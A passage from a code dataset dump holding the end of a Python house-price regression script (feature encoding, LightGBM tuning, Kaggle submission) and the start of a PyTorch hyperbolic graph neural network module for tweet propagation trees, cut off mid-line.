BsmtQual\n bsm_map = {'None': 0, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['BsmtQual'] = dataframe['BsmtQual'].map(bsm_map).astype('int')\n\n # BsmtCond\n bsm_map = {'None': 0, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['BsmtCond'] = dataframe['BsmtCond'].map(bsm_map).astype('int')\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n # BsmtFinType1\n bsm_map = {'None': 0, 'Rec': 1, 'BLQ': 1, 'LwQ': 2, 'ALQ': 3, 'Unf': 3, 'GLQ': 4}\n dataframe['BsmtFinType1'] = dataframe['BsmtFinType1'].map(bsm_map).astype('int')\n\n # BsmtFinType2\n bsm_map = {'None': 0, 'BLQ': 1, 'Rec': 2, 'LwQ': 2, 'Unf': 3, 'GLQ': 3, 'ALQ': 4}\n dataframe['BsmtFinType2'] = dataframe['BsmtFinType2'].map(bsm_map).astype('int')\n\n # BsmtExposure\n bsm_map = {'None': 0, 'No': 1, 'Mn': 2, 'Av': 3, 'Gd': 4}\n dataframe['BsmtExposure'] = dataframe['BsmtExposure'].map(bsm_map).astype('int')\n\n # Heating\n heat_map = {'Floor': 1, 'Grav': 1, 'Wall': 2, 'OthW': 3, 'GasW': 4, 'GasA': 5}\n dataframe['Heating'] = dataframe['Heating'].map(heat_map).astype('int')\n\n # HeatingQC\n heat_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['HeatingQC'] = dataframe['HeatingQC'].map(heat_map).astype('int')\n\n # KitchenQual\n kitch_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['KitchenQual'] = dataframe['KitchenQual'].map(heat_map).astype('int')\n\n # FireplaceQu\n fire_map = {'None': 0, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['FireplaceQu'] = dataframe['FireplaceQu'].map(fire_map).astype('int')\n\n # GarageCond\n garage_map = {'None': 1, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n dataframe['GarageCond'] = dataframe['GarageCond'].map(garage_map).astype('int')\n #dataframe['GarageCond'].value_counts()\n\n # GarageQual\n garage_map = {'None': 1, 'Po': 1, 'Fa': 2, 'TA': 3, 'Ex': 4, 'Gd': 5}\n dataframe['GarageQual'] = dataframe['GarageQual'].map(garage_map).astype('int')\n\n # PavedDrive\n paved_map = {'N': 1, 'P': 2, 'Y': 3}\n dataframe['PavedDrive'] = dataframe['PavedDrive'].map(paved_map).astype('int')\n\n # CentralAir: Merkezi klima\n cent = {\"N\": 0, \"Y\": 1}\n dataframe[\"CentralAir\"] = dataframe[\"CentralAir\"].map(cent).astype(\"int\")\n dataframe.groupby(\"CentralAir\").agg({\"SalePrice\": \"mean\"})\n\n # LandSlope\n dataframe.loc[dataframe[\"LandSlope\"] == \"Gtl\", \"LandSlope\"] = 1\n dataframe.loc[dataframe[\"LandSlope\"] == \"Sev\", \"LandSlope\"] = 2\n dataframe.loc[dataframe[\"LandSlope\"] == \"Mod\", \"LandSlope\"] = 2\n dataframe[\"LandSlope\"] = dataframe[\"LandSlope\"].astype(\"int\")\n\n # OverallQual\n dataframe.loc[dataframe[\"OverallQual\"] == 1, \"OverallQual\"] = 1\n dataframe.loc[dataframe[\"OverallQual\"] == 2, \"OverallQual\"] = 1\n dataframe.loc[dataframe[\"OverallQual\"] == 3, \"OverallQual\"] = 1\n dataframe.loc[dataframe[\"OverallQual\"] == 4, \"OverallQual\"] = 2\n dataframe.loc[dataframe[\"OverallQual\"] == 5, \"OverallQual\"] = 3\n dataframe.loc[dataframe[\"OverallQual\"] == 6, \"OverallQual\"] = 4\n dataframe.loc[dataframe[\"OverallQual\"] == 7, \"OverallQual\"] = 5\n dataframe.loc[dataframe[\"OverallQual\"] == 8, \"OverallQual\"] = 6\n dataframe.loc[dataframe[\"OverallQual\"] == 9, \"OverallQual\"] = 7\n dataframe.loc[dataframe[\"OverallQual\"] == 10, \"OverallQual\"] = 8\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n #################################################\n\n # FEATURE ENGINEERING FOR OTHER FEATURES\n # Evin genel durumunu\n dataframe[\"OverallGrade\"] = dataframe[\"OverallQual\"] * dataframe[\"OverallCond\"]\n # garaj kalitesi ile garaj durumu\n dataframe[\"GarageGrade\"] = dataframe[\"GarageQual\"] * dataframe[\"GarageCond\"]\n # şömine kalitesi için\n dataframe[\"FireplaceScore\"] = dataframe[\"Fireplaces\"] * dataframe[\"FireplaceQu\"]\n # Ev için toplam SF (bodrum dahil)\n dataframe[\"AllSF\"] = dataframe[\"GrLivArea\"] + dataframe[\"TotalBsmtSF\"]\n # 1. + 2. katlar için toplam SF\n dataframe[\"AllFlrsSF\"] = dataframe[\"1stFlrSF\"] + dataframe[\"2ndFlrSF\"]\n\n dataframe['TotalSF'] = (dataframe['BsmtFinSF1'] +\n dataframe['BsmtFinSF2'] +\n dataframe['1stFlrSF'] +\n dataframe['2ndFlrSF'])\n # toplam banyolar\n dataframe['TotalBathrooms'] = (dataframe['FullBath'] +\n (0.5 * dataframe['HalfBath']) +\n dataframe['BsmtFullBath'] +\n (0.5 * dataframe['BsmtHalfBath']))\n\n # toplam sundurma alanları\n dataframe['TotalPorchSF'] = (dataframe['OpenPorchSF'] +\n dataframe['3SsnPorch'] +\n dataframe['EnclosedPorch'] +\n dataframe['ScreenPorch'])\n\n # Kategorilern kalitelerini kendi içlerinde toplayalım:\n # dış cephedeki malzemenin mevcut durumunu ve kalitesini toplayarak dış cephe malzemesi kalitesini bulma.\n dataframe['TotalExtQual'] = (dataframe['ExterQual'] +\n dataframe['ExterCond'])\n\n # Bodrum kalitesi için\n dataframe['TotalBsmQual'] = (dataframe['BsmtQual'] +\n dataframe['BsmtCond'] +\n dataframe['BsmtFinType1'] +\n dataframe['BsmtFinType2'])\n\n # Tüm kaliteleri toplayalım:\n dataframe['TotalQual'] = dataframe['OverallQual'] + \\\n dataframe['TotalExtQual'] + \\\n dataframe['TotalBsmQual'] + \\\n dataframe['KitchenQual'] + \\\n dataframe['HeatingQC']\n\n dataframe['HasPool'] = dataframe['PoolArea'].apply(lambda x: 1 if x > 0 else 0)\n dataframe['Has2ndFloor'] = dataframe['2ndFlrSF'].apply(lambda x: 1 if x > 0 else 0)\n dataframe['hasgarage'] = dataframe['GarageCars'].apply(lambda x: 1 if x > 0 else 0)\n dataframe['HasFireplace'] = dataframe['Fireplaces'].apply(lambda x: 1 if x > 0 else 0)\n dataframe['HasPorch'] = dataframe['TotalPorchSF'].apply(lambda x: 1 if x > 0 else 0)\n dataframe['HasBsmt'] = dataframe['TotalBsmtSF'].apply(lambda x: 1 if x > 0 else 0)\n dataframe[\"hascentralAir\"] = dataframe[\"CentralAir\"].apply(lambda x: 1 if x > 0 else 0)\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n\n corr = dataframe.corr()\n corr.sort_values([\"SalePrice\"], ascending=False, inplace=True)\n print(corr.SalePrice[:11])\n\n low_corrs, high_corrs = find_correlation(dataframe, num_cols)\n high_correlated_cols(dataframe, False, 0.80)\n\n # RARE ENCODING\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n dataframe = rare_encoder(dataframe, 0.01, cat_cols)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n useless_cols = [col for col in cat_cols if dataframe[col].nunique() == 1 or\n (dataframe[col].nunique() == 2 and (dataframe[col].value_counts() / len(dataframe) <= 0.01).any(axis=None))]\n dataframe[useless_cols].head()\n\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n\n # cat_cols güncellemesi\n cat_cols = [col for col in cat_cols if col not in useless_cols]\n\n # gereksiz kolonları dataframeden silinmesi\n for col in useless_cols:\n dataframe.drop(col, axis=1, inplace=True)\n\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n #dataframe.shape\n\n ##################\n # Label Encoding & One-Hot Encoding\n ##################\n cat_cols = cat_cols + cat_but_car\n dataframe = one_hot_encoder(dataframe, cat_cols, drop_first=True)\n check_df(dataframe)\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n useless_cols_new = [col for col in cat_cols if (dataframe[col].value_counts() / len(dataframe) <= 0.01).any(axis=None)]\n\n for col in useless_cols_new:\n cat_summary(dataframe, col)\n\n for col in useless_cols_new:\n dataframe.drop(col, axis=1, inplace=True)\n\n #dataframe.shape\n cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n rare_analyser(dataframe, \"SalePrice\", cat_cols)\n return dataframe\n\n######################################################\n# Base Models\n######################################################\ndef base_models(x, y, scoring):\n print(\"Base Models...\")\n models = [('LR', LinearRegression()),\n (\"Ridge\", Ridge()),\n (\"Lasso\", Lasso()),\n (\"ElasticNet\", ElasticNet()),\n ('KNN', KNeighborsRegressor()),\n ('CART', DecisionTreeRegressor()),\n ('RF', RandomForestRegressor()),\n ('SVR', SVR()),\n ('GBM', GradientBoostingRegressor()),\n (\"XGBoost\", XGBRegressor(objective='reg:squarederror')),\n (\"LightGBM\", LGBMRegressor()),\n (\"CatBoost\", CatBoostRegressor(verbose=False))]\n\n for name, regressor in models:\n rmse = np.mean(np.sqrt(-cross_val_score(regressor, x, y, cv=5, scoring=\"neg_mean_squared_error\")))\n print(f\"RMSE: {round(rmse, 4)} ({name}) \")\n# RMSE: 0.123 (LightGBM)\n\n######################################################\n# Automated Hyperparameter Optimization\n######################################################\ndef hyperparameter_optimization(x, y, cv=10, scoring=\"neg_mean_squared_error\"):\n print(\"Hyperparameter Optimization....\")\n\n # lightgbm_params = {'boosting_type': ['gbdt', 'dart', 'goss'],\n # \"learning_rate\": [0.01, 0.03, 0.05, 0.07, 0.1, 0.2],\n # \"n_estimators\": [100, 150, 200, 300, 400, 500],\n # \"max_depth\": [3, 5, 8],\n # \"colsample_bytree\": [0.3, 0.4, 0.5, 0.7, 0.8, 1]}\n\n best_params= {'boosting_type': 'gbdt',\n 'colsample_bytree': 0.3,\n 'learning_rate': 0.03,\n 'max_depth': 3,\n 'n_estimators': 500}\n\n models = [('LightGBM', LGBMRegressor(random_state=46), best_params)]\n\n for name, regressor, params in models:\n print(f\"########## {name} ##########\")\n rmse = np.mean(np.sqrt(-cross_val_score(regressor, x, y, cv=5, scoring=scoring)))\n print(f\"RMSE BEFORE: {round(rmse, 4)} ({name}) \")\n final_model = regressor.set_params(**best_params).fit(x,y)\n results_rmse = np.mean(np.sqrt(-cross_val_score(final_model, x, y, cv=cv, scoring=scoring)))\n print(f\"RMSE AFTER: {round(results_rmse, 4)} ({name}) \")\n # 0.11413422992471374\n\n # Feature Selection\n # i = 1\n # while i < 8:\n # zero_imp_cols = feature_imp[feature_imp[\"Value\"] < i][\"Feature\"].values\n # selected_cols = [col for col in x.columns if col not in zero_imp_cols]\n # i = i + 0.1\n # final_model = lgbm_model.set_params(**lgbm_gs_best.best_params_).fit(x[selected_cols], y)\n # rmse = np.mean(\n # np.sqrt(-cross_val_score(final_model, x[selected_cols], y, cv=5, scoring=\"neg_mean_squared_error\")))\n # print(i)\n # print(len(selected_cols))\n # print(rmse)\n\n feature_imp = pd.DataFrame({'Value': final_model.feature_importances_, 'Feature': x.columns})\n zero_imp_cols = feature_imp[feature_imp[\"Value\"] < 6.2][\"Feature\"].values\n selected_cols = [col for col in x.columns if col not in zero_imp_cols]\n\n print(\"Hyperparameter Optimization with Selected Features...\")\n print(f\"########## {name} ##########\")\n rmse = np.mean(np.sqrt(-cross_val_score(regressor, x[selected_cols], y, cv=5, scoring=scoring)))\n print(f\"RMSE BEFORE: {round(rmse, 4)} ({name}) \")\n final_model = regressor.set_params(**best_params).fit(x[selected_cols],y)\n results_rmse = np.mean(np.sqrt(-cross_val_score(final_model, x[selected_cols], y, cv=cv, scoring=scoring)))\n print(f\"RMSE AFTER: {round(results_rmse, 4)} ({name}) \")\n # 0.11297465470162453\n\n return final_model, selected_cols\n\n\n#######################################\n# Sonuçların Yüklenmesi\n#######################################\ndef Predict(final_model, selected_cols, test_df):\n print(\"Predict...\")\n submission_df = pd.DataFrame()\n submission_df['Id'] = test_df[\"Id\"] # kaggle'nin bana verdiği id'leri\n y_pred_sub = final_model.predict(test_df[selected_cols])\n # gerçek tahmin edilen değerler yani gerçek tahmin edilen hatalar elimizde şatış fiyatları.\n y_pred_sub = np.expm1(y_pred_sub) # logaritmayı geri aldık.\n submission_df['SalePrice'] = y_pred_sub\n return submission_df\n\n######################################################\n# Main\n######################################################\n\ndef main(base, dump, scoring):\n\n with timer(\"Data Preprocessing\"):\n train = pd.read_csv(\"..\\house_prices\\train.csv\")\n test = pd.read_csv(\"..\\house_prices\\test.csv\")\n df = train.append(test).reset_index(drop=True)\n df_ = house_price_prep(dataframe=df)\n\n test_df = df_[df_['SalePrice'].isnull()].drop(\"SalePrice\", axis=1)\n train_df = df_[df_['SalePrice'].notnull()]\n\n y = np.log1p(train_df['SalePrice'])\n x = train_df.drop([\"Id\", \"SalePrice\"], axis=1)\n\n if base:\n with timer(\"Base Models\"):\n base_models(x, y, scoring)\n\n with timer(\"Hyperparameter Optimization\"):\n final_model, selected_cols = hyperparameter_optimization(x, y, cv=10, scoring=scoring)\n\n with timer(\"Predict\"):\n\n submission_df = Predict(final_model, selected_cols, test_df)\n if dump:\n print(\"Predict Model Saved\")\n submission_df.to_csv('submission.csv', index=False)\n joblib.dump(submission_df, \"predict_clf.pkl\")\n\n\nif __name__ == \"__main__\":\n\n namespace = get_namespace()\n\n with timer(\"Full Script Running Time\"):\n main(base=namespace.base, dump=namespace.dump, scoring=namespace.scoring)\n\n\n","repo_name":"rabia-koc/AUTOMATED_HOUSE_PRICE_PREDICTION_ML","sub_path":"AUTOMATED_HOUSE_PRICE_PREDICTION_ML.py","file_name":"AUTOMATED_HOUSE_PRICE_PREDICTION_ML.py","file_ext":"py","file_size_in_byte":29619,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"37526727463","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 2 18:00:44 2021\n\n@author: huymai\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport json\nimport math\nimport copy\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset\nfrom torch_geometric.data import Data\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch_geometric.data import DataLoader\nfrom torch.nn import Parameter\nimport torch.nn.init as init\nfrom torch.nn.modules.module import Module \nimport torch_geometric\n\nfrom torch.utils import mkldnn as mkldnn_utils\nfrom torch_scatter import scatter_mean, scatter_max\n\nfrom sklearn.metrics import f1_score\n\nfrom torch_geometric.nn import MessagePassing\nfrom torch_geometric.utils import add_self_loops, degree\n\n# treeGraph stuff\nclass Node_tweet(object):\n def __init__(self, idx=None):\n self.children = []\n self.idx = idx\n self.feature = []\n self.parent = None\n \ndef construct_tree(graph):\n index2node = {}\n for i in graph:\n node = Node_tweet(idx=i)\n index2node[i] = node\n for j in graph:\n indexC = j\n indexP = graph[j]['parent']\n nodeC = index2node[indexC]\n nodeC.feature = graph[j]['vec']\n if not indexP == 'None':\n nodeP = index2node[int(indexP)]\n nodeC.parent = nodeP\n nodeP.children.append(nodeC)\n else:\n root = nodeC\n rootindex = indexC\n root_feature = graph[rootindex]['vec']\n \n # convert graph to adjacency matrix and edge matrix\n adj_matrix = np.zeros([len(index2node), len(index2node)])\n row = []\n col = []\n x_x = []\n edge_matrix = []\n for index_i in range(len(index2node)):\n for index_j in range(len(index2node)):\n if index2node[index_i].children != None and index2node[index_j] in index2node[index_i].children:\n adj_matrix[index_i][index_j] = 1\n adj_matrix[index_j][index_i] = 1\n row.extend([index_i, index_j])\n col.extend([index_j, index_i])\n x_x.append(index2node[index_i].feature)\n edge_matrix.append(row)\n edge_matrix.append(col)\n \n return x_x, adj_matrix, root_feature, rootindex, edge_matrix, index2node\n\n# Graph Dataset\nclass GraphDataset(Dataset):\n def __init__(self, list_of_features, edge_indices, labels):\n self.list_of_features = list_of_features\n self.edge_indices = edge_indices\n self.labels = labels\n\n def __len__(self):\n return len(self.edge_indices)\n\n def __getitem__(self, index):\n # get edge_index\n edge_index = np.array(self.edge_indices[index])\n \n # get features (x)\n features = self.list_of_features[index]\n \n # get label (y)\n label = self.labels[index]\n \n return Data(x = torch.tensor(features), edge_index = torch.LongTensor(edge_index), y = torch.tensor(label))\n\n# Hyperbolic math\ndef cosh(x, clamp=15):\n return x.clamp(-clamp, clamp).cosh()\n\n\ndef sinh(x, clamp=15):\n return x.clamp(-clamp, clamp).sinh()\n\n\ndef tanh(x, clamp=15):\n return x.clamp(-clamp, clamp).tanh()\n\n\ndef arcosh(x):\n return Arcosh.apply(x)\n\n\ndef arsinh(x):\n return Arsinh.apply(x)\n\n\ndef artanh(x):\n return Artanh.apply(x)\n\n\nclass Artanh(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n x = x.clamp(-1 + 1e-15, 1 - 1e-15)\n ctx.save_for_backward(x)\n z = x.double()\n return (torch.log_(1 + z).sub_(torch.log_(1 - z))).mul_(0.5).to(x.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n return grad_output / (1 - input ** 2)\n\n\nclass Arsinh(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n ctx.save_for_backward(x)\n z = x.double()\n return (z + torch.sqrt_(1 + z.pow(2))).clamp_min_(1e-15).log_().to(x.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n return grad_output / (1 + input ** 2) ** 0.5\n\n\nclass Arcosh(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n x = x.clamp(min=1.0 + 1e-15)\n ctx.save_for_backward(x)\n z = x.double()\n return (z + torch.sqrt_(z.pow(2) - 1)).clamp_min_(1e-15).log_().to(x.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n return grad_output / (input ** 2 - 1) ** 0.5\n \n# DenseAtt\nclass DenseAtt(nn.Module):\n def __init__(self, in_features, dropout):\n super(DenseAtt, self).__init__()\n self.dropout = dropout\n self.linear = nn.Linear(2 * in_features, 1, bias=True)\n self.in_features = in_features\n\n def forward (self, x, adj):\n n = x.size(0)\n # n x 1 x d\n x_left = torch.unsqueeze(x, 1)\n x_left = x_left.expand(-1, n, -1)\n # 1 x n x d\n x_right = torch.unsqueeze(x, 0)\n x_right = x_right.expand(n, -1, -1)\n\n x_cat = torch.cat((x_left, x_right), dim=2)\n att_adj = self.linear(x_cat).squeeze()\n att_adj = F.sigmoid(att_adj)\n att_adj = torch.mul(adj.to('cpu'), att_adj)\n return att_adj\n \n# Manifold\nclass Manifold(object):\n \"\"\"\n Abstract class to define operations on a manifold.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.eps = 10e-8\n\n def sqdist(self, p1, p2, c):\n \"\"\"Squared distance between pairs of points.\"\"\"\n raise NotImplementedError\n\n def egrad2rgrad(self, p, dp, c):\n \"\"\"Converts Euclidean Gradient to Riemannian Gradients.\"\"\"\n raise NotImplementedError\n\n def proj(self, p, c):\n \"\"\"Projects point p on the manifold.\"\"\"\n raise NotImplementedError\n\n def proj_tan(self, u, p, c):\n \"\"\"Projects u on the tangent space of p.\"\"\"\n raise NotImplementedError\n\n def proj_tan0(self, u, c):\n \"\"\"Projects u on the tangent space of the origin.\"\"\"\n raise NotImplementedError\n\n def expmap(self, u, p, c):\n \"\"\"Exponential map of u at point p.\"\"\"\n raise NotImplementedError\n\n def logmap(self, p1, p2, c):\n \"\"\"Logarithmic map of point p1 at point p2.\"\"\"\n raise NotImplementedError\n\n def expmap0(self, u, c):\n \"\"\"Exponential map of u at the origin.\"\"\"\n raise NotImplementedError\n\n def logmap0(self, p, c):\n \"\"\"Logarithmic map of point p at the origin.\"\"\"\n raise NotImplementedError\n\n def mobius_add(self, x, y, c, dim=-1):\n \"\"\"Adds points x and y.\"\"\"\n raise NotImplementedError\n\n def mobius_matvec(self, m, x, c):\n \"\"\"Performs hyperboic martrix-vector multiplication.\"\"\"\n raise NotImplementedError\n\n def init_weights(self, w, c, irange=1e-5):\n \"\"\"Initializes random weigths on the manifold.\"\"\"\n raise NotImplementedError\n\n def inner(self, p, c, u, v=None, keepdim=False):\n \"\"\"Inner product for tangent vectors at point x.\"\"\"\n raise NotImplementedError\n\n def ptransp(self, x, y, u, c):\n \"\"\"Parallel transport of u from x to y.\"\"\"\n raise NotImplementedError\n\n def ptransp0(self, x, u, c):\n \"\"\"Parallel transport of u from the origin to y.\"\"\"\n raise NotImplementedError\n\n\nclass ManifoldParameter(Parameter):\n \"\"\"\n Subclass of torch.nn.Parameter for Riemannian optimization.\n \"\"\"\n def __new__(cls, data, requires_grad, manifold, c):\n return Parameter.__new__(cls, data, requires_grad)\n\n def __init__(self, data, requires_grad, manifold, c):\n self.c = c\n self.manifold = manifold\n\n def __repr__(self):\n return '{} Parameter containing:\\n'.format(self.manifold.name) + super(Parameter, self).__repr__()\n \nclass Hyperboloid(Manifold):\n \"\"\"\n Hyperboloid manifold class.\n We use the following convention: -x0^2 + x1^2 + ... + xd^2 = -K\n c = 1 / K is the hyperbolic curvature. \n \"\"\"\n\n def __init__(self):\n super(Hyperboloid, self).__init__()\n self.name = 'Hyperboloid'\n self.eps = {torch.float32: 1e-7, torch.float64: 1e-15}\n self.min_norm = 1e-15\n self.max_norm = 1e6\n\n def minkowski_dot(self, x, y, keepdim=True):\n res = torch.sum(x * y, dim=-1) - 2 * x[..., 0] * y[..., 0]\n if keepdim:\n res = res.view(res.shape + (1,))\n return res\n\n def minkowski_norm(self, u, keepdim=True):\n dot = self.minkowski_dot(u, u, keepdim=keepdim)\n return torch.sqrt(torch.clamp(dot, min=self.eps[u.dtype]))\n\n def sqdist(self, x, y, c):\n K = 1. / c\n prod = self.minkowski_dot(x, y)\n theta = torch.clamp(-prod / K, min=1.0 + self.eps[x.dtype])\n sqdist = K * arcosh(theta) ** 2\n # clamp distance to avoid nans in Fermi-Dirac decoder\n return torch.clamp(sqdist, max=50.0)\n\n def proj(self, x, c):\n K = 1. / c\n d = x.size(-1) - 1\n y = x.narrow(-1, 1, d)\n y_sqnorm = torch.norm(y.float(), p=2, dim=1, keepdim=True) ** 2 \n mask = torch.ones_like(x)\n mask[:, 0] = 0\n vals = torch.zeros_like(x)\n x = x.float()\n # print(x.dtype)\n vals[:, 0:1] = torch.sqrt(torch.clamp(K + y_sqnorm, min=self.eps[x.dtype]))\n return vals + mask * x\n\n def proj_tan(self, u, x, c):\n hidden_dim = 32\n if x.shape[0] == hidden_dim and len(x.shape) == 1:\n # print(x.shape)\n x = torch.reshape(x, (1, hidden_dim))\n K = 1. / c\n d = x.size(-1) - 1\n ux = torch.sum(x.narrow(-1, 1, d) * u.narrow(-1, 1, d), dim=1, keepdim=True)\n mask = torch.ones_like(u)\n mask[:, 0] = 0\n vals = torch.zeros_like(u)\n # print(vals.shape)\n # print(\"====\")\n # print(x.shape)\n vals[:, 0:1] = ux / torch.clamp(x[:, 0:1], min=self.eps[x.dtype])\n return vals + mask * u\n\n def proj_tan0(self, u, c):\n narrowed = u.narrow(-1, 0, 1)\n vals = torch.zeros_like(u)\n vals[:, 0:1] = narrowed\n return u - vals\n\n def expmap(self, u, x, c):\n K = 1. / c\n sqrtK = K ** 0.5\n normu = self.minkowski_norm(u)\n normu = torch.clamp(normu, max=self.max_norm)\n theta = normu / sqrtK\n theta = torch.clamp(theta, min=self.min_norm)\n result = cosh(theta) * x + sinh(theta) * u / theta\n return self.proj(result, c)\n \n def logmap(self, x, y, c):\n K = 1. / c\n xy = torch.clamp(self.minkowski_dot(x, y) + K, max=-self.eps[x.dtype]) - K\n u = y + xy * x * c\n normu = self.minkowski_norm(u)\n normu = torch.clamp(normu, min=self.min_norm)\n dist = self.sqdist(x, y, c) ** 0.5\n result = dist * u / normu\n return self.proj_tan(result, x, c)\n\n def expmap0(self, u, c):\n K = 1. / c\n sqrtK = K ** 0.5\n d = u.size(-1) - 1\n x = u.narrow(-1, 1, d).view(-1, d)\n x_norm = torch.norm(x.float(), p=2, dim=1, keepdim=True)\n x_norm = torch.clamp(x_norm, min=self.min_norm)\n theta = x_norm / sqrtK\n res = torch.ones_like(u)\n res[:, 0:1] = sqrtK * cosh(theta)\n res[:, 1:] = sqrtK * sinh(theta) * x / x_norm\n return self.proj(res, c)\n\n def logmap0(self, x, c):\n K = 1. / c\n sqrtK = K ** 0.5\n d = x.size(-1) - 1\n y = x.narrow(-1, 1, d).view(-1, d)\n y_norm = torch.norm(y, p=2, dim=1, keepdim=True)\n y_norm = torch.clamp(y_norm, min=self.min_norm)\n res = torch.zeros_like(x)\n theta = torch.clamp(x[:, 0:1] / sqrtK, min=1.0 + self.eps[x.dtype])\n res[:, 1:] = sqrtK * arcosh(theta) * y / y_norm\n return res\n\n def mobius_add(self, x, y, c):\n u = self.logmap0(y, c)\n v = self.ptransp0(x, u, c)\n return self.expmap(v, x, c)\n\n def mobius_matvec(self, m, x, c):\n u = self.logmap0(x, c).float()\n mu = u @ m.transpose(-1, -2)\n return self.expmap0(mu, c)\n\n def ptransp(self, x, y, u, c):\n logxy = self.logmap(x, y, c)\n logyx = self.logmap(y, x, c)\n sqdist = torch.clamp(self.sqdist(x, y, c), min=self.min_norm)\n alpha = self.minkowski_dot(logxy, u) / sqdist\n res = u - alpha * (logxy + logyx)\n return self.proj_tan(res, y, c)\n\n def ptransp0(self, x, u, c):\n K = 1. / c\n sqrtK = K ** 0.5\n x0 = x.narrow(-1, 0, 1)\n d = x.size(-1) - 1\n y = x.narrow(-1, 1, d)\n y_norm = torch.clamp(torch.norm(y, p=2, dim=1, keepdim=True), min=self.min_norm)\n y_normalized = y / y_norm\n v = torch.ones_like(x)\n v[:, 0:1] = - y_norm \n v[:, 1:] = (sqrtK - x0) * y_normalized\n alpha = torch.sum(y_normalized * u[:, 1:], dim=1, keepdim=True) / sqrtK\n res = u - alpha * v\n return self.proj_tan(res, x, c)\n\n def to_poincare(self, x, c):\n K = 1. / c\n sqrtK = K ** 0.5\n d = x.size(-1) - 1\n return sqrtK * x.narrow(-1, 1, d) / (x[:, 0:1] + sqrtK)\n \n# Hyperbolic layers\ndef get_dim_act_curv(c, act, num_layers, feat_dim, dim):\n \"\"\"\n Helper function to get dimension and activation at every layer.\n :param args:\n :return:\n \"\"\"\n acts = [act] * (num_layers - 1)\n dims = [feat_dim] + ([dim] * (num_layers - 1))\n n_curvatures = num_layers - 1\n \n # fixed curvature\n curvatures = [torch.tensor([c]) for _ in range(n_curvatures)]\n curvatures = [curv.to(device) for curv in curvatures]\n \n return dims, acts, curvatures\n\nclass HyperbolicGraphConvolution(nn.Module):\n \"\"\"\n Hyperbolic graph convolution layer.\n \"\"\"\n\n def __init__(self, manifold, in_features, out_features, c_in, c_out, dropout, act, use_bias, use_att, local_agg):\n super(HyperbolicGraphConvolution, self).__init__()\n self.linear = HypLinear(manifold, in_features, out_features, c_in, dropout, use_bias)\n self.agg = HypAgg(manifold, c_in, out_features, dropout, use_att, local_agg)\n self.hyp_act = HypAct(manifold, c_in, c_out, act)\n\n def forward(self, input):\n x, adj = input\n h = self.linear(x)\n h = self.agg(h, adj)\n h = self.hyp_act(h)\n output = h, adj\n return output\n\n\nclass HypLinear(nn.Module):\n \"\"\"\n Hyperbolic linear layer.\n \"\"\"\n\n def __init__(self, manifold, in_features, out_features, c, dropout, use_bias):\n super(HypLinear, self).__init__()\n self.manifold = manifold\n self.in_features = in_features\n self.out_features = out_features\n self.c = c\n self.dropout = dropout\n self.use_bias = use_bias\n self.bias = nn.Parameter(torch.Tensor(out_features))\n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\n self.reset_parameters()\n\n def reset_parameters(self):\n init.uniform_(self.weight)\n init.constant_(self.bias, 0)\n\n def forward(self, x):\n drop_weight = F.dropout(self.weight, self.dropout, training=self.training)\n mv = self.manifold.mobius_matvec(drop_weight, x, self.c) # manifold\n res = self.manifold.proj(mv, self.c)\n if self.use_bias:\n bias = self.manifold.proj_tan0(self.bias.view(1, -1), self.c)\n hyp_bias = self.manifold.expmap0(bias, self.c)\n hyp_bias = self.manifold.proj(hyp_bias, self.c)\n res = self.manifold.mobius_add(res, hyp_bias, c=self.c)\n res = self.manifold.proj(res, self.c)\n return res\n\n def extra_repr(self):\n return 'in_features={}, out_features={}, c={}'.format(\n self.in_features, self.out_features, self.c\n )\n\n\nclass HypAgg(Module):\n \"\"\"\n Hyperbolic aggregation layer.\n \"\"\"\n\n def __init__(self, manifold, c, in_features, dropout, use_att, local_agg):\n super(HypAgg, self).__init__()\n self.manifold = manifold\n self.c = c\n\n self.in_features = in_features\n self.dropout = dropout\n self.local_agg = local_agg\n self.use_att = use_att\n if self.use_att:\n self.att = DenseAtt(in_features, dropout) # DenseAtt\n\n def forward(self, x, adj):\n x_tangent = self.manifold.logmap0(x, c=self.c)\n if self.use_att:\n if self.local_agg:\n x_local_tangent = []\n for i in range(x.size(0)):\n x_local_tangent.append(self.manifold.logmap(x[i], x, c=self.c))\n x_local_tangent = torch.stack(x_local_tangent, dim=0)\n adj_att = self.att(x_tangent, adj)\n att_rep = adj_att.unsqueeze(-1) * x_local_tangent\n support_t = 